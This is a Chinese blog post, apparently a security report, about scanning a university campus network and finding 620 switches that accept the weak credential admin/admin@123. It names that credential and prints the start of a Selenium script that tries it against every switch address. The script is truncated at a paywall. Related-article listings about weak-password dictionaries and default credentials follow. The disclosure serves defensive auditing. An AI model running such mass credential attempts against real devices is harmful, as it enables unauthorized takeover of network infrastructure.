某大学某校区大范围交换机弱口令调查报告

最新推荐文章于 2026-04-30 10:26:02 发布
原创 最新推荐文章于 2026-04-30 10:26:02 发布 · 2.2k 阅读 · 0
在一次测试中发现大量交换机使用弱口令adminadmin@123,影响620台交换机及4362台主机。通过编写Selenium脚本进行横向渗透测试,揭示网络安全漏洞。

1. 前言

在某次例行的测试中发现某交换机存在弱口令,进行横向测试时发现影响范围较广,遂有此报告。本次受影响的交换机有 620 台,涉及主机 4362 台,光缆 865 条。对学校整体具有较大的威胁性


2. 探测过程

对校内 10 段内网地址进行大规模扫描发现有 1124 个交换机的相关接口
在这里插入图片描述
在进行弱口令的尝试过程中发现 admin admin@123 可以成功登陆,且拥有对交换机整体的控制权
在这里插入图片描述
基于横向渗透的思想,我们对上述得到的交换机地址都用这个账号密码进行爆破


由于在写爆破脚本的时候ssl连接一直会出现问题。最后不得不放弃了requests直接发包的方式,而是使用了selenium来帮助我们完成工作


最后我们的脚本如下:

from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver import ActionChains
from selenium.webdriver.support.select import Select
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from lxml import etree
import time
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.chrome.options import Options
from queue import Queue
import threading



options = webdriver.ChromeOptions()
options.add_argument('--ignore-certificate-errors')

with open(r"C:\Users\shinelon\Desktop\summary.txt",encoding="UTF-8") as f:
    urls= f.read().splitlines()

q = Queue(maxsize=0)
for each in urls:
    q.put(each)

def try_vuln(browser):
    while True:
        if q.empty():
            break
        url = q.get()
        url = url.split()[3]
        try:
            browser.get(url)#打开浏览器预设网址
            time.sleep(1)
            if "/simple/view/login.html" in browser.current_url:
                print("Find: "+ browser.current_url)
最低0.47元/天 解锁文章
2020最全弱口令常用口令集合
09-26
2020最新的弱口令集合,从top100,1000到top100000的密码,以及常见的从3位起到10位的弱口令,还有姓名拼音等多个弱口令字典,各种撞库等,数字亲测好用,家快来下载吧,挺不错的一个资源哦!!
SAN交换机(brocade)解决弱口令.docx
01-29
OEM博科SAN交换机弱口令
弱口令排查思路
望江湖,且看云卷云舒
05-05 4476
在现在的攻防对抗、重保等重要时期中,基于人员安全意识的攻击日渐增多,人员的安全意识淡薄也造成了很多内网终端、业务系统沦陷的实际安全事件的发生。在日常网络安全运营工作中弱口令的排查整改要从管理和技术等多维度进行整改,从整体提升企业网络安全人防侧的意识,降低人防缺陷造成的入侵事件发生的可能。 弱口令分类 1、应用系统 2、中间件 3、数据库 4、操作系统 --------------- 风险分析 攻击者会利用弱口令或默认口令登录目标机,造成以合法身份访问目标系统进一步攻击的风险。 技术..
Linux——系统安全及应用(弱口令检测、端口扫描)
ML908的博客
11-15 1382
基本安全措施 系统账号清理 将非登陆用户的Shell设为/sbin/nologin,表示禁止中断登陆,确保不被人为改动 在系统中,除了手动创建的各种账号之外,还包括随系统或程序安装过程而生成的其他量账号。除了root之外,其他量账号只是用来维护系统运作、启动或保持服务进程,一般是不允许登陆的,因此也称为非登陆用户 [root@localhost ~]# grep "/sbin/nologi...
别再只用admin/123456了!这份企业级弱口令自查清单,帮你堵住90%的安全漏洞
最新发布
weixin_28698059的博客
04-30 139
本文深入探讨企业级弱口令防御策略,从智能弱口令库构建到自动化扫描实践,提供全面的自查清单和闭环处置流程。文章揭示现代企业弱口令风险的三盲区,并介绍四维模型密码库和工程化扫描方案,帮助堵住90%的安全漏洞,提升企业网络安全防护水平。
弱口令漏洞
xv7777666的博客
04-24 1353
举例来说,如果有两个Payload标志位置,第一个Payload值为A和B,第二个Payload值为C和D,则发起攻击时,将共发起四次攻击,第一次使用的Payload分别为A和C,第二次使用的Payload分别为A和D,第三次使用的Payload分别为B和C,第四次使用的Payload分别为B和D。——它使用一组Payload集合,依次替换Payload位置上(一次攻击只能使用一个Payload位置)被§标志的文本(而没有被§标志的文本将不受影响),对服务器端进行请求,通常用于测试请求参数是否存在漏洞。
golang 对rdp的弱口令测试_某大学渗透测试实战靶场报告Part2
weixin_42361026的博客
12-06 1663
点击上方“蓝字”关注公众号获取最新信息!本文作者:久久久久久久、欧根亲王号、森浩、3had0w(贝塔安全实验室-核心成员)一、192.168.3.X段的信息搜集(1) 192.168.3.x段存活主机信息使用以前自己改的一个domain.bat批处理脚本或K8哥哥的Ladon得到192.168.3.x段存活主机如下,Ladon项目地址:https://github.com/k8gege/...
Linux系统弱口令检测和网络端口扫描
weixin_53496421的博客
02-22 3504
文章标题系统弱口令检测操作步骤 系统弱口令检测 Joth the Ripper,简称JR 一款开源的密码分析工具,支持字典式的暴力破解 通过对shadow文件的口令分析,可以检测密码强度 官方网站:http://www.openwall.com/john/ 操作步骤 cd /opt tar zxvf john-1.9.0.tar.gz #解压工具包 yum -y install gcc gcc-c++ make
手把手教你打造自己的弱口令扫描工具(系统弱口令篇)
10-09 3074
0x01 前言   在渗透测试过程中,弱口令检测是必要的一个环节,选择一个好用的弱口令扫描工具,尤为重要。   类似的弱口令检测工具如:Hydra、Hscan、X-Scan,很多时候满足不了自己的需求。   通过Python打造自己的弱口令扫描工具,集成在一起的Python脚本,在实战应用中,更切合实际。 0x02 FTP模块   FTP一般分为两种情况,匿名访问和弱口令,分别...
弱口令扫描工具有哪些?检测的主要方法及常用弱口令密码
白帽黑客鹏哥的博客
12-11 1万+
弱口令工具主要用于密码破解、安全评估和网络防御测试。这些工具通过尝试一系列常用的弱口令来检测系统或账户的安全性。
厂商常用的弱口令集合
Libra1313的博客
02-12 3962
网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。
系统和应用弱口令原因分析
qq_40770143的博客
10-26 2504
首先准备一台linux系统,然后安装工具nali (nali下载地址) 1、Linux系统排查步骤 1)#cat messages*|grep sshd|grep Acc|awk ‘{print $9,$11}’|sort|uniq -c|nali 2)#cat sshd.log |grep Failed|awk ‘{print $9,$11}’|sort|uniq -c|nali 3)查看是否有...
常用开源的弱口令检查审计工具
热门推荐
Marsal的博客
08-08 1万+
常用的密码爆破工具
举例说明一下常见的弱口令_常见网站入侵手段及防御方法
weixin_39523280的博客
11-27 1620
上传入侵上传入侵便是通过上传文件来获得权限,针对有上传文件权限的网站实施,好比论坛可以上传附件、资讯站可以投稿上传图片,这些都可能为上传木马提供便利,上传木马以后,很多信息都会轻松暴露出来的。这个漏洞在网站源码中比较常见,被黑客们利用的最为猖獗,利用上传漏洞可以直接得到WEBSHELL,危害等级超级高。防御方法:第三方开源代码要及时升级官方提供的程序补丁;注意对上传的文件进行限制,例如限制文件类型...
详解通过Mysql弱口令得到系统权限
asli33的专栏
03-16 1690
<br />来源:http://www.sai52.com/archives/722/<br /> <br />很早网上就有了用mysql弱口令得到webshell教程,但是这次我要说的不是得到webshell,而是直接得到系统权限,看清楚了,是“直接”得到!<br /> <br />首先,我简单说一下mysql弱口令得到系统权限得过程:首先利用mysql脚本上传udf dll文件,然后利用注册UDF DLL中自写的Function函数,而执行任意命令。<br /><br /> 思路很简单,网上也有一些教
系统的弱口令问题,可以采取以下措施
Clarkbrave的博客
02-05 1632
工信部对系统风险要求整改整改措施。通过这些措施,可以有效提升系统的安全性,降低弱口令带来的风险。
【SAP Hana】XS应用管理控制台登录
XLevon的博客
11-20 1265
完成第一个程序XS应用Hello World的开发后,可以登陆XS应用管理控制台查看。 URL:http://<SAP HANA 主机名 or IP地址>:80<实例号>/sap/hana/xs/admin/ 用户名和密码:对应SAP HANA数据库的用户名和密码。 问题现象:服务器拒绝了请求。 问题原因:该账号缺少相应的访问权限。 解决方案:需要在HANA Studio中为该用户添加以下sap.hana.xs.admin.roles::* (1)用管理员账号SY
弱口令(Weak Password)总结和爆破工具
Innocence_0的博客
12-01 1148
网站管理、运营人员由于安全意识不足,为了方便、避免忘记密码等,使用了非常容易记住的密码,或者是直接采用了系统的默认密码等。攻击者利用此漏洞可直接进入应用系统或者管理系统,从而进行系统、网页、数据的篡改与删除,非法获取系统、用户的数据,甚至可能导致服务器沦陷。弱口令(weak password) 没有严格和准确的定义,通常认为容易被别人(他们有可能对你很了解)猜测到或被破解工具破解的口令均为弱口令
渗透测试常见弱口令汇总
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
05-26 2676
常见网络安全设备弱口令(默认口令) 设备 默认账号 默认密码 深信服产品 sangfor sangfor sangfor@2018 sangfor@2019 深信服科技 AD dlanrecover 深信服负载均衡 AD 3.6 admin admin 深信服WAC ( WNS V2.6) admin admin 深信服VPN Admin Admin 深信服ipsec-VPN (SSL 5.5) Ad.
利用数据库漏洞扫描评估数据库安全性 4 弱口令扫描
weixin_34132768的博客
01-11 272
在前面,游侠给家介绍了数据库漏洞扫描的一些知识,并且发起了一次针对Oracle数据库的“授权扫描”,现在我们进行一次“弱口令扫描”,因为弱口令实在是数据库几乎最的威胁,所以,在数据库漏洞扫描中专列了“弱口令扫描”。本项的目标依然是Oracle数据库。 发起扫描的方式如前面文章所言,在任务上鼠标右键“弱口令扫描” 数据库漏洞扫描会列出任务包含的数据库服务器地址,填入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

h1nt

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值